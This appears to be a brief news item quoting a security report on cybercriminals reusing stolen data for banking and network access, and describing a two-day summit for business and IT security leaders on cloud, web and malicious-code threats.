“Once spent, money is gone but data can be used and reused to produce more money. The ability to reuse data to access online banking applications, authorise and activate credit cards, or access organisational networks, has enabled cyber criminals to create an extensive archive of data for ongoing illicit activities,” says the report.

The two day security summit is being attended by business managers, CIOs and chief IT security officers who are discussing the current and future information security threat landscape.

This year’s event highlights the dangers of a connected world. These include cloud security, web services and online security, as well as the growing trend to use malicious code for industrial espionage and sabotage.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...